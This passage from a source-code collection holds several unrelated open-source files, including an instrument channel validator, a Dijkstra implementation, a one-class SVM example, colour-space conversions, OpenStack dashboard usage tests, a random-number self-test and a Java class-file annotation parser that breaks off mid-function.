errors.append(errMsg)
# test AWG name to channel format
validName = True
validName &= '-' in channel
if validName:
instrName, instrChan = channel.rsplit('-',1)
if instrName not in instruments.keys():
errMsg = 'Physical Channel "{0}" Label format is invalid. It should be Name-Channel'.format(channel)
errors.append(errMsg)
if instrName != instrument:
errMsg = 'Physical Channel "{0}" Label instrName {1} != instrument.label {2}'.format(channel, instrName, instrument)
errors.append(errMsg)
# apply device specific channel namming conventions
# force converions of awgChan to unicode so multimethod dispatch will
# work with str or unicode
errMsg = invalid_awg_name_convention(channels[channel].instrument, str(instrChan))
if errMsg:
errors.append(errMsg)
else:
errMsg = 'Physical Channel "{0}" Label format is invalid. It should be Name-Channel'.format(channel)
errors.append(errMsg)
return errors
#####################################################################################
## AWG Model Type naming conventions
def invalid_awg_name_convention_common(label, channelName, conventionList):
errorStr = 'instrument {0} channel name {1} not in convention list {2}'
if channelName not in conventionList:
return errorStr.format(label, channelName, conventionList)
return None
def invalid_awg_name_convention(awgLabel, channelName):
instr = instruments[awgLabel]
convention = instr.get_naming_convention()
return invalid_awg_name_convention_common(awgLabel, channelName,convention)
# GUI validator
def is_valid_awg_channel_name(channelName):
if '-' in channelName:
awgName, awgChan = channelName.rsplit('-',1)
else:
awgName = channelName
if awgName not in instruments.keys():
return False
return (invalid_awg_name_convention(awgName, awgChan) is None)
#####################################################################################
def is_valid_instrument_name(label):
# instrument must be a valid Matlab identifier
return (MATLAB_VALID_NAME_REGEX.match(label) is not None)
def validate_instrumentLib():
errors = []
invalidNames = [instrument for instrument in instruments.keys() if not is_valid_instrument_name(instrument)]
if invalidNames != []:
for name in invalidNames:
errMsg = "Instrument name {0} is not a valid Matlab Name".format(name)
errors.append(errMsg)
return errors
#####################################################################################
def validate_sweepLib():
errors = []
for key in sweeps.keys():
if isinstance(sweeps[key],Sweeps.PointsSweep):
try:
numPoints = int((sweeps[key].stop - sweeps[key].start)/floatbits.prevfloat(sweeps[key].step)) + 1
except ValueError as e:
errors.append("Sweep named %s issue computing Num. Points: %s" % (sweeps[key].label,e))
return errors
#####################################################################################
def validate_channelLib():
errors = []
if 'digitizerTrig' not in channels.keys():
errMsg = 'A LogicalMarkerChannel named digitizerTrig is required'
errors.append([errMsg])
# test gate pulses
if 'slaveTrig' not in channels.keys():
errMsg = 'A LogicalMarkerChannel named slaveTrig is required'
errors.append([errMsg])
# test map_logical_to_physical
rp_errors = test_require_physical()
pc_errors = test_physical_channels()
lc_errors = test_logical_channels()
if pc_errors != []:
errors.append(pc_errors)
if lc_errors != []:
errors.append(lc_errors)
if rp_errors != []:
errors.append(rp_errors)
errors = list(itertools.chain(*errors))
return errors
def validate_dynamic_lib(channelsLib, instrumentLib):
global channels
global instruments
channels = channelsLib
instruments = instrumentLib.instrDict
return validate_lib()
def validate_lib():
errors = []
channel_errors = validate_channelLib()
if channel_errors != []:
errors.append(channel_errors)
instrument_errors = validate_instrumentLib()
if instrument_errors != []:
errors.append(instrument_errors)
sweep_errors = validate_sweepLib()
if sweep_errors != []:
errors.append(sweep_errors)
errors = list(itertools.chain(*errors))
return errors
def default_repr(items, item):
return '\t{0}: {1}'.format(item,
items[item].__class__.__name__)
def default_list_repr(items, name):
print("Listing available {}:".format(name))
for item in items.keys():
print(default_repr(items,item))
def list_channels():
print("Listing available channels:")
for channel in channels.keys():
print("\t", repr(channels[channel]))
def list_instruments():
default_list_repr(instruments, 'instruments')
def list_measurements():
default_list_repr(measurements, 'measurements')
def list_sweeps():
default_list_repr(sweeps, 'sweeps')
def list_config():
list_channels()
print
list_instruments()
print
list_measurements()
print
list_sweeps()
def draw_wiring_digram():
topLevelChannels = [channelName for channelName in channels.keys() if requires_physical_channel(channelName)]
print("digraph Exp {")
for channel in topLevelChannels:
print('"{}"'.format(channel))
if channels[channel].physChan is not None:
print(' -> "{}"'.format(channels[channel].physChan.label))
if channels[channel].physChan.AWG is not None:
print(' -> "{}"'.format(channels[channel].physChan.AWG.label))
typeMap = (
(is_logicalmarker_channel,"lightblue"),
(is_physicalmarker_channel,"red"),
(is_physicalIQ_channel,"blue"),
(is_qubit_channel,"yellow"),
)
for lookup, color in typeMap:
names = [channelName for channelName in channels.keys() if lookup(channelName)]
for channel in names:
print("{0} [color={1},style=filled];".format(channel, color))
instrumentNames = [channelName for channelName in instruments.keys()]
for channel in instrumentNames:
print("{} [color=green,style=filled];".format(channel))
print("}")
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-d', dest='draw_digram', action='store_true')
parser.add_argument('-v', dest='validate', action='store_true')
parser.add_argument('-l', dest='list', action='store_true')
args = parser.parse_args()
if args.draw_digram:
draw_wiring_digram()
if args.validate:
error = validate_lib()
print(error)
if args.list:
list_config()
| apache-2.0 |
xpansa/pmis | project_time_schedule/models/dijkstra.py | 1 | 3303 | # Dijkstra's algorithm for shortest paths
# David Eppstein, UC Irvine, 4 April 2002
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/117228
from priodict import priorityDictionary
def Dijkstra(G, start, end=None):
"""
Find shortest paths from the start vertex to all
vertices nearer than or equal to the end.
The input graph G is assumed to have the following
representation: A vertex can be any object that can
be used as an index into a dictionary. G is a
dictionary, indexed by vertices. For any vertex v,
G[v] is itself a dictionary, indexed by the neighbors
of v. For any edge v->w, G[v][w] is the length of
the edge. This is related to the representation in
<http://www.python.org/doc/essays/graphs.html>
where Guido van Rossum suggests representing graphs
as dictionaries mapping vertices to lists of neighbors,
however dictionaries of edges have many advantages
over lists: they can store extra information (here,
the lengths), they support fast existence tests,
and they allow easy modification of the graph by edge
insertion and removal. Such modifications are not
needed here but are important in other graph algorithms.
Since dictionaries obey iterator protocol, a graph
represented as described here could be handed without
modification to an algorithm using Guido's representation.
Of course, G and G[v] need not be Python dict objects;
they can be any other object that obeys dict protocol,
for instance a wrapper in which vertices are URLs
and a call to G[v] loads the web page and finds its links.
The output is a pair (D,P) where D[v] is the distance
from start to v and P[v] is the predecessor of v along
the shortest path from s to v.
Dijkstra's algorithm is only guaranteed to work correctly
when all edge lengths are positive. This code does not
verify this property for all edges (only the edges seen
before the end vertex is reached), but will correctly
compute shortest paths even for some graphs with negative
edges, and will raise an exception if it discovers that
a negative edge has caused it to make a mistake.
"""
D = {} # dictionary of final distances
P = {} # dictionary of predecessors
Q = priorityDictionary() # est.dist. of non-final vert.
Q[start] = 0
for v in Q:
D[v] = Q[v]
if v == end:
break
for w in G[v]:
vwLength = D[v] + G[v][w]
if w in D:
if vwLength < D[w]:
raise ValueError(
"Dijkstra: found better path to already-final vertex"
)
elif w not in Q or vwLength < Q[w]:
Q[w] = vwLength
P[w] = v
return (D, P)
def shortestPath(G, start, end):
"""
Find a single shortest path from the given start vertex
to the given end vertex.
The input has the same conventions as Dijkstra().
The output is a list of the vertices in order along
the shortest path.
"""
D, P = Dijkstra(G, start, end)
Path = []
while 1:
Path.append(end)
if end == start:
break
end = P[end]
Path.reverse()
return Path
| agpl-3.0 |
zorojean/scikit-learn | examples/svm/plot_oneclass.py | 249 | 2302 | """
==========================================
One-class SVM with non-linear kernel (RBF)
==========================================
An example using a one-class SVM for novelty detection.
:ref:`One-class SVM <svm_outlier_detection>` is an unsupervised
algorithm that learns a decision function for novelty detection:
classifying new data as similar or different to the training set.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.font_manager
from sklearn import svm
xx, yy = np.meshgrid(np.linspace(-5, 5, 500), np.linspace(-5, 5, 500))
# Generate train data
X = 0.3 * np.random.randn(100, 2)
X_train = np.r_[X + 2, X - 2]
# Generate some regular novel observations
X = 0.3 * np.random.randn(20, 2)
X_test = np.r_[X + 2, X - 2]
# Generate some abnormal novel observations
X_outliers = np.random.uniform(low=-4, high=4, size=(20, 2))
# fit the model
clf = svm.OneClassSVM(nu=0.1, kernel="rbf", gamma=0.1)
clf.fit(X_train)
y_pred_train = clf.predict(X_train)
y_pred_test = clf.predict(X_test)
y_pred_outliers = clf.predict(X_outliers)
n_error_train = y_pred_train[y_pred_train == -1].size
n_error_test = y_pred_test[y_pred_test == -1].size
n_error_outliers = y_pred_outliers[y_pred_outliers == 1].size
# plot the line, the points, and the nearest vectors to the plane
Z = clf.decision_function(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
plt.title("Novelty Detection")
plt.contourf(xx, yy, Z, levels=np.linspace(Z.min(), 0, 7), cmap=plt.cm.Blues_r)
a = plt.contour(xx, yy, Z, levels=[0], linewidths=2, colors='red')
plt.contourf(xx, yy, Z, levels=[0, Z.max()], colors='orange')
b1 = plt.scatter(X_train[:, 0], X_train[:, 1], c='white')
b2 = plt.scatter(X_test[:, 0], X_test[:, 1], c='green')
c = plt.scatter(X_outliers[:, 0], X_outliers[:, 1], c='red')
plt.axis('tight')
plt.xlim((-5, 5))
plt.ylim((-5, 5))
plt.legend([a.collections[0], b1, b2, c],
["learned frontier", "training observations",
"new regular observations", "new abnormal observations"],
loc="upper left",
prop=matplotlib.font_manager.FontProperties(size=11))
plt.xlabel(
"error train: %d/200 ; errors novel regular: %d/40 ; "
"errors novel abnormal: %d/40"
% (n_error_train, n_error_test, n_error_outliers))
plt.show()
| bsd-3-clause |
ofermend/medicare-demo | socialite/jython/Lib/colorsys.py | 92 | 3449 | """Conversion functions between RGB and other color systems.
This modules provides two functions for each color system ABC:
rgb_to_abc(r, g, b) --> a, b, c
abc_to_rgb(a, b, c) --> r, g, b
All inputs and outputs are triples of floats in the range [0.0...1.0]
(with the exception of I and Q, which covers a slightly larger range).
Inputs outside the valid range may cause exceptions or invalid outputs.
Supported color systems:
RGB: Red, Green, Blue components
YIQ: Luminance, Chrominance (used by composite video signals)
HLS: Hue, Luminance, Saturation
HSV: Hue, Saturation, Value
"""
# References:
# http://en.wikipedia.org/wiki/YIQ
# http://en.wikipedia.org/wiki/HLS_color_space
# http://en.wikipedia.org/wiki/HSV_color_space
__all__ = ["rgb_to_yiq","yiq_to_rgb","rgb_to_hls","hls_to_rgb",
"rgb_to_hsv","hsv_to_rgb"]
# Some floating point constants
ONE_THIRD = 1.0/3.0
ONE_SIXTH = 1.0/6.0
TWO_THIRD = 2.0/3.0
# YIQ: used by composite video signals (linear combinations of RGB)
# Y: perceived grey level (0.0 == black, 1.0 == white)
# I, Q: color components
def rgb_to_yiq(r, g, b):
y = 0.30*r + 0.59*g + 0.11*b
i = 0.60*r - 0.28*g - 0.32*b
q = 0.21*r - 0.52*g + 0.31*b
return (y, i, q)
def yiq_to_rgb(y, i, q):
r = y + 0.948262*i + 0.624013*q
g = y - 0.276066*i - 0.639810*q
b = y - 1.105450*i + 1.729860*q
if r < 0.0: r = 0.0
if g < 0.0: g = 0.0
if b < 0.0: b = 0.0
if r > 1.0: r = 1.0
if g > 1.0: g = 1.0
if b > 1.0: b = 1.0
return (r, g, b)
# HLS: Hue, Luminance, Saturation
# H: position in the spectrum
# L: color lightness
# S: color saturation
def rgb_to_hls(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
# XXX Can optimize (maxc+minc) and (maxc-minc)
l = (minc+maxc)/2.0
if minc == maxc: return 0.0, l, 0.0
if l <= 0.5: s = (maxc-minc) / (maxc+minc)
else: s = (maxc-minc) / (2.0-maxc-minc)
rc = (maxc-r) / (maxc-minc)
gc = (maxc-g) / (maxc-minc)
bc = (maxc-b) / (maxc-minc)
if r == maxc: h = bc-gc
elif g == maxc: h = 2.0+rc-bc
else: h = 4.0+gc-rc
h = (h/6.0) % 1.0
return h, l, s
def hls_to_rgb(h, l, s):
if s == 0.0: return l, l, l
if l <= 0.5: m2 = l * (1.0+s)
else: m2 = l+s-(l*s)
m1 = 2.0*l - m2
return (_v(m1, m2, h+ONE_THIRD), _v(m1, m2, h), _v(m1, m2, h-ONE_THIRD))
def _v(m1, m2, hue):
hue = hue % 1.0
if hue < ONE_SIXTH: return m1 + (m2-m1)*hue*6.0
if hue < 0.5: return m2
if hue < TWO_THIRD: return m1 + (m2-m1)*(TWO_THIRD-hue)*6.0
return m1
# HSV: Hue, Saturation, Value
# H: position in the spectrum
# S: color saturation ("purity")
# V: color brightness
def rgb_to_hsv(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
v = maxc
if minc == maxc: return 0.0, 0.0, v
s = (maxc-minc) / maxc
rc = (maxc-r) / (maxc-minc)
gc = (maxc-g) / (maxc-minc)
bc = (maxc-b) / (maxc-minc)
if r == maxc: h = bc-gc
elif g == maxc: h = 2.0+rc-bc
else: h = 4.0+gc-rc
h = (h/6.0) % 1.0
return h, s, v
def hsv_to_rgb(h, s, v):
if s == 0.0: return v, v, v
i = int(h*6.0) # XXX assume int() truncates!
f = (h*6.0) - i
p = v*(1.0 - s)
q = v*(1.0 - s*f)
t = v*(1.0 - s*(1.0-f))
if i%6 == 0: return v, t, p
if i == 1: return q, v, p
if i == 2: return p, v, t
if i == 3: return p, q, v
if i == 4: return t, p, v
if i == 5: return v, p, q
# Cannot get here
| apache-2.0 |
dan1/horizon-x509 | openstack_dashboard/dashboards/project/overview/tests.py | 8 | 15122 | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import logging
from django.conf import settings
from django.contrib.auth import REDIRECT_FIELD_NAME # noqa
from django.core.urlresolvers import reverse
from django import http
from django.utils import timezone
from mox3.mox import IsA # noqa
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
from openstack_dashboard import usage
INDEX_URL = reverse('horizon:project:overview:index')
class UsageViewTests(test.TestCase):
@test.create_stubs({api.nova: ('usage_get',
'tenant_absolute_limits',
'extension_supported')})
def _stub_nova_api_calls(self, nova_stu_enabled=True,
tenant_limits_exception=False,
stu_exception=False):
api.nova.extension_supported(
'SimpleTenantUsage', IsA(http.HttpRequest)) \
.AndReturn(nova_stu_enabled)
api.nova.extension_supported(
'SimpleTenantUsage', IsA(http.HttpRequest)) \
.AndReturn(nova_stu_enabled)
if tenant_limits_exception:
api.nova.tenant_absolute_limits(IsA(http.HttpRequest))\
.AndRaise(tenant_limits_exception)
else:
api.nova.tenant_absolute_limits(IsA(http.HttpRequest)) \
.AndReturn(self.limits['absolute'])
if nova_stu_enabled:
self._nova_stu_enabled(stu_exception)
@test.create_stubs({api.cinder: ('tenant_absolute_limits',)})
def _stub_cinder_api_calls(self):
api.cinder.tenant_absolute_limits(IsA(http.HttpRequest)) \
.AndReturn(self.cinder_limits['absolute'])
@test.create_stubs({api.neutron: ('is_extension_supported',),
api.network: ('floating_ip_supported',
'tenant_floating_ip_list',
'security_group_list')})
def _stub_neutron_api_calls(self, neutron_sg_enabled=True):
api.neutron.is_extension_supported(
IsA(http.HttpRequest),
'security-group').AndReturn(neutron_sg_enabled)
api.network.floating_ip_supported(IsA(http.HttpRequest)) \
.AndReturn(True)
api.network.tenant_floating_ip_list(IsA(http.HttpRequest)) \
.AndReturn(self.floating_ips.list())
if neutron_sg_enabled:
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.q_secgroups.list())
def _nova_stu_enabled(self, exception=False):
now = timezone.now()
start = datetime.datetime(now.year, now.month, 1, 0, 0, 0, 0)
end = datetime.datetime(now.year, now.month, now.day, 23, 59, 59, 0)
if exception:
api.nova.usage_get(IsA(http.HttpRequest), self.tenant.id,
start, end) \
.AndRaise(exception)
else:
api.nova.usage_get(IsA(http.HttpRequest), self.tenant.id,
start, end) \
.AndReturn(api.nova.NovaUsage(self.usages.first()))
def _common_assertions(self, nova_stu_enabled,
maxTotalFloatingIps=float("inf")):
res = self.client.get(reverse('horizon:project:overview:index'))
usages = res.context['usage']
self.assertTemplateUsed(res, 'project/overview/usage.html')
self.assertIsInstance(usages, usage.ProjectUsage)
self.assertEqual(nova_stu_enabled,
res.context['simple_tenant_usage_enabled'])
if nova_stu_enabled:
self.assertContains(res, 'form-inline')
else:
self.assertNotContains(res, 'form-inline')
self.assertEqual(usages.limits['maxTotalFloatingIps'],
maxTotalFloatingIps)
def test_usage(self):
self._test_usage(nova_stu_enabled=True)
def test_usage_disabled(self):
self._test_usage(nova_stu_enabled=False)
def _test_usage(self, nova_stu_enabled):
self._stub_nova_api_calls(nova_stu_enabled)
self._stub_neutron_api_calls()
self._stub_cinder_api_calls()
self.mox.ReplayAll()
self._common_assertions(nova_stu_enabled)
def test_usage_nova_network(self):
self._test_usage_nova_network(nova_stu_enabled=True)
def test_usage_nova_network_disabled(self):
self._test_usage_nova_network(nova_stu_enabled=False)
@test.create_stubs({api.base: ('is_service_enabled',),
api.cinder: ('is_volume_service_enabled',)})
def _test_usage_nova_network(self, nova_stu_enabled):
self._stub_nova_api_calls(nova_stu_enabled)
api.base.is_service_enabled(IsA(http.HttpRequest), 'network') \
.MultipleTimes().AndReturn(False)
api.cinder.is_volume_service_enabled(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(False)
self.mox.ReplayAll()
self._common_assertions(nova_stu_enabled, maxTotalFloatingIps=10)
@test.create_stubs({api.nova: ('usage_get',
'extension_supported')})
def _stub_nova_api_calls_unauthorized(self, exception):
api.nova.extension_supported(
'SimpleTenantUsage', IsA(http.HttpRequest)) \
.AndReturn(True)
self._nova_stu_enabled(exception)
def test_unauthorized(self):
self._stub_nova_api_calls_unauthorized(
self.exceptions.nova_unauthorized)
self.mox.ReplayAll()
url = reverse('horizon:project:overview:index')
# Avoid the log message in the test
# when unauthorized exception will be logged
logging.disable(logging.ERROR)
res = self.client.get(url)
logging.disable(logging.NOTSET)
self.assertEqual(302, res.status_code)
self.assertEqual(('Location', settings.TESTSERVER +
settings.LOGIN_URL + '?' +
REDIRECT_FIELD_NAME + '=' + url),
res._headers.get('location', None),)
def test_usage_csv(self):
self._test_usage_csv(nova_stu_enabled=True)
def test_usage_csv_disabled(self):
self._test_usage_csv(nova_stu_enabled=False)
def _test_usage_csv(self, nova_stu_enabled=True):
self._stub_nova_api_calls(nova_stu_enabled)
self._stub_neutron_api_calls()
self._stub_cinder_api_calls()
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:project:overview:index') +
"?format=csv")
self.assertTemplateUsed(res, 'project/overview/usage.csv')
self.assertIsInstance(res.context['usage'], usage.ProjectUsage)
def test_usage_exception_usage(self):
self._stub_nova_api_calls(stu_exception=self.exceptions.nova)
self._stub_neutron_api_calls()
self._stub_cinder_api_calls()
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:project:overview:index'))
self.assertTemplateUsed(res, 'project/overview/usage.html')
self.assertEqual(res.context['usage'].usage_list, [])
def test_usage_exception_quota(self):
self._stub_nova_api_calls(tenant_limits_exception=self.exceptions.nova)
self._stub_neutron_api_calls()
self._stub_cinder_api_calls()
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:project:overview:index'))
self.assertTemplateUsed(res, 'project/overview/usage.html')
self.assertEqual(res.context['usage'].quotas, {})
def test_usage_default_tenant(self):
self._stub_nova_api_calls()
self._stub_neutron_api_calls()
self._stub_cinder_api_calls()
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:project:overview:index'))
self.assertTemplateUsed(res, 'project/overview/usage.html')
self.assertIsInstance(res.context['usage'], usage.ProjectUsage)
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_usage_with_neutron(self):
self._test_usage_with_neutron(neutron_sg_enabled=True)
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_usage_with_neutron_nova_security_group(self):
self._test_usage_with_neutron(neutron_sg_enabled=False)
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_usage_with_neutron_floating_ip_disabled(self):
self._test_usage_with_neutron(neutron_fip_enabled=False)
@test.create_stubs({api.neutron: ('tenant_quota_get',
'is_extension_supported'),
api.network: ('floating_ip_supported',
'tenant_floating_ip_list',
'security_group_list')})
def _test_usage_with_neutron_prepare(self):
self._stub_nova_api_calls()
self._stub_cinder_api_calls()
def _test_usage_with_neutron(self, neutron_sg_enabled=True,
neutron_fip_enabled=True):
self._test_usage_with_neutron_prepare()
api.neutron.is_extension_supported(
IsA(http.HttpRequest), 'quotas').AndReturn(True)
api.neutron.is_extension_supported(
IsA(http.HttpRequest),
'security-group').AndReturn(neutron_sg_enabled)
api.network.floating_ip_supported(IsA(http.HttpRequest)) \
.AndReturn(neutron_fip_enabled)
if neutron_fip_enabled:
api.network.tenant_floating_ip_list(IsA(http.HttpRequest)) \
.AndReturn(self.floating_ips.list())
if neutron_sg_enabled:
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.q_secgroups.list())
api.neutron.tenant_quota_get(IsA(http.HttpRequest), self.tenant.id) \
.AndReturn(self.neutron_quotas.first())
self.mox.ReplayAll()
self._test_usage_with_neutron_check(neutron_sg_enabled,
neutron_fip_enabled)
def _test_usage_with_neutron_check(self, neutron_sg_enabled=True,
neutron_fip_expected=True,
max_fip_expected=50,
max_sg_expected=20):
res = self.client.get(reverse('horizon:project:overview:index'))
if neutron_fip_expected:
self.assertContains(res, 'Floating IPs')
self.assertContains(res, 'Security Groups')
res_limits = res.context['usage'].limits
# Make sure the floating IPs comes from Neutron (50 vs. 10)
max_floating_ips = res_limits['maxTotalFloatingIps']
self.assertEqual(max_floating_ips, max_fip_expected)
if neutron_sg_enabled:
# Make sure the security group limit comes from Neutron (20 vs. 10)
max_security_groups = res_limits['maxSecurityGroups']
self.assertEqual(max_security_groups, max_sg_expected)
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_usage_with_neutron_quotas_ext_error(self):
self._test_usage_with_neutron_prepare()
api.neutron.is_extension_supported(
IsA(http.HttpRequest), 'quotas').AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
self._test_usage_with_neutron_check(neutron_fip_expected=False,
max_fip_expected=float("inf"),
max_sg_expected=float("inf"))
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_usage_with_neutron_sg_ext_error(self):
self._test_usage_with_neutron_prepare()
api.neutron.is_extension_supported(
IsA(http.HttpRequest), 'quotas').AndReturn(True)
api.neutron.is_extension_supported(
IsA(http.HttpRequest),
'security-group').AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
self._test_usage_with_neutron_check(neutron_fip_expected=False,
max_fip_expected=float("inf"),
max_sg_expected=float("inf"))
def test_usage_with_cinder(self):
self._test_usage_cinder(cinder_enabled=True)
def test_usage_without_cinder(self):
self._test_usage_cinder(cinder_enabled=False)
@test.create_stubs({api.base: ('is_service_enabled',),
api.cinder: ('is_volume_service_enabled',)})
def _test_usage_cinder(self, cinder_enabled):
self._stub_nova_api_calls(True)
if cinder_enabled:
self._stub_cinder_api_calls()
api.base.is_service_enabled(IsA(http.HttpRequest), 'network') \
.MultipleTimes().AndReturn(False)
api.cinder.is_volume_service_enabled(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(cinder_enabled)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:project:overview:index'))
usages = res.context['usage']
self.assertTemplateUsed(res, 'project/overview/usage.html')
self.assertIsInstance(usages, usage.ProjectUsage)
if cinder_enabled:
self.assertEqual(usages.limits['totalVolumesUsed'], 1)
self.assertEqual(usages.limits['maxTotalVolumes'], 10)
self.assertEqual(usages.limits['totalGigabytesUsed'], 5)
self.assertEqual(usages.limits['maxTotalVolumeGigabytes'], 1000)
else:
self.assertNotIn('totalVolumesUsed', usages.limits)
def _test_usage_charts(self):
self._stub_nova_api_calls(False)
self._stub_neutron_api_calls()
self._stub_cinder_api_calls()
self.mox.ReplayAll()
return self.client.get(reverse('horizon:project:overview:index'))
def test_usage_charts_created(self):
res = self._test_usage_charts()
self.assertTrue('charts' in res.context)
def test_usage_charts_infinite_quota(self):
res = self._test_usage_charts()
max_floating_ips = res.context['usage'].limits['maxTotalFloatingIps']
self.assertEqual(max_floating_ips, float("inf"))
self.assertContains(res, '(No Limit)')
| apache-2.0 |
benschmaus/catapult | third_party/google-endpoints/Crypto/SelfTest/Random/OSRNG/test_posix.py | 131 | 1777 | # -*- coding: utf-8 -*-
#
# SelfTest/Util/test_posix.py: Self-test for the OSRNG.posix.new() function
#
# Written in 2008 by Dwayne C. Litzenberger <[email protected]>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test suite for Crypto.Random.OSRNG.posix"""
__revision__ = "$Id$"
import unittest
class SimpleTest(unittest.TestCase):
def runTest(self):
"""Crypto.Random.OSRNG.posix.new()"""
# Import the OSRNG.nt module and try to use it
import Crypto.Random.OSRNG.posix
randobj = Crypto.Random.OSRNG.posix.new()
x = randobj.read(16)
y = randobj.read(16)
self.assertNotEqual(x, y)
def get_tests(config={}):
return [SimpleTest()]
if __name__ == '__main__':
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4 expandtab:
| bsd-3-clause |
fesh0r/pjp | pjp/attribute/attrib_annotations.py | 1 | 7969 | from .attrib_base import AttributeBase, AttributeLengthError
from ..constantpool import ConstantType
__all__ = ['AttributeRuntimeVisibleAnnotations', 'AttributeRuntimeInvisibleAnnotations',
'AttributeRuntimeVisibleParameterAnnotations', 'AttributeRuntimeInvisibleParameterAnnotations',
'AttributeAnnotationDefault']
class Error(Exception):
pass
class AnnotationError(Error):
pass
class AttributeRuntimeVisibleAnnotations(AttributeBase):
def __init__(self, type_index, parent):
AttributeBase.__init__(self, type_index, parent)
num_annotations, = self.read_data('>H')
expected_length = 2
self.annotations = []
for _ in range(num_annotations):
annotation = _Annotation(self)
expected_length += annotation.length
self.annotations.append(annotation)
if expected_length != self.length:
raise AttributeLengthError
def __str__(self):
return '%s(%s)' % (self.type, len(self.annotations))
class AttributeRuntimeInvisibleAnnotations(AttributeBase):
def __init__(self, type_index, parent):
AttributeBase.__init__(self, type_index, parent)
num_annotations, = self.read_data('>H')
expected_length = 2
self.annotations = []
for _ in range(num_annotations):
annotation = _Annotation(self)
expected_length += annotation.length
self.annotations.append(annotation)
if expected_length != self.length:
raise AttributeLengthError
def __str__(self):
return '%s(%s)' % (self.type, len(self.annotations))
class AttributeRuntimeVisibleParameterAnnotations(AttributeBase):
def __init__(self, type_index, parent):
AttributeBase.__init__(self, type_index, parent)
num_parameters, = self.read_data('>B')
expected_length = 1
self.parameters = []
for _ in range(num_parameters):
num_annotations, = self.read_data('>H')
expected_length += 2
annotations = []
for _ in range(num_annotations):
annotation = _Annotation(self)
expected_length += annotation.length
annotations.append(annotation)
self.parameters.append(annotations)
if expected_length != self.length:
raise AttributeLengthError
def __str__(self):
return '%s(%s)' % (self.type, len(self.parameters))
class AttributeRuntimeInvisibleParameterAnnotations(AttributeBase):
def __init__(self, type_index, parent):
AttributeBase.__init__(self, type_index, parent)
num_parameters, = self.read_data('>B')
expected_length = 1
self.parameters = []
for _ in range(num_parameters):
num_annotations, = self.read_data('>H')
expected_length += 2
annotations = []
for _ in range(num_annotations):
annotation = _Annotation(self)
expected_length += annotation.length
annotations.append(annotation)
self.parameters.append(annotations)
if expected_length != self.length:
raise AttributeLengthError
def __str__(self):
return '%s(%s)' % (self.type, len(self.parameters))
class AttributeAnnotationDefault(AttributeBase):
def __init__(self, type_index, parent):
AttributeBase.__init__(self, type_index, parent)
self.default_value = _ElementValue(self)
if self.default_value.length != self.length:
raise AttributeLengthError
def __str__(self):
return '%s(%s)' % (self.type, self.default_value)
class _Annotation(object):
def __init__(self, parent):
self._parent = parent
self.read_data = parent.read_data
self.constant_pool = parent.constant_pool
self._type_index, = self.read_data('>H')
self.length = 2
self.type = self.constant_pool.ref(self._type_index, [ConstantType.UTF8])
num_element_value_pairs, = self.read_data('>H')
self.length += 2
self.element_value_pairs = []
for _ in range(num_element_value_pairs):
element_name_index, = self.read_data('>H')
self.length += 2
element_name = self.constant_pool.ref(element_name_index, [ConstantType.UTF8])
element_value = _ElementValue(self)
self.length += element_value.length
self.element_value_pairs.append((element_name, element_value))
def __str__(self):
return '%s(%s)' % (self.type, len(self.element_value_pairs))
class _ElementValue(object):
def __init__(self, parent):
self._parent = parent
self.read_data = parent.read_data
self.constant_pool = parent.constant_pool
self.tag, = self.read_data('>B')
self.length = 1
tag = chr(self.tag)
if tag == 'B':
self._value_index, = self.read_data('>H')
self.length += 2
self.value = self.constant_pool.ref(self._value_index, [ConstantType.INTEGER])
elif tag == 'C':
self._value_index, = self.read_data('>H')
self.length += 2
self.value = self.constant_pool.ref(self._value_index, [ConstantType.INTEGER])
elif tag == 'D':
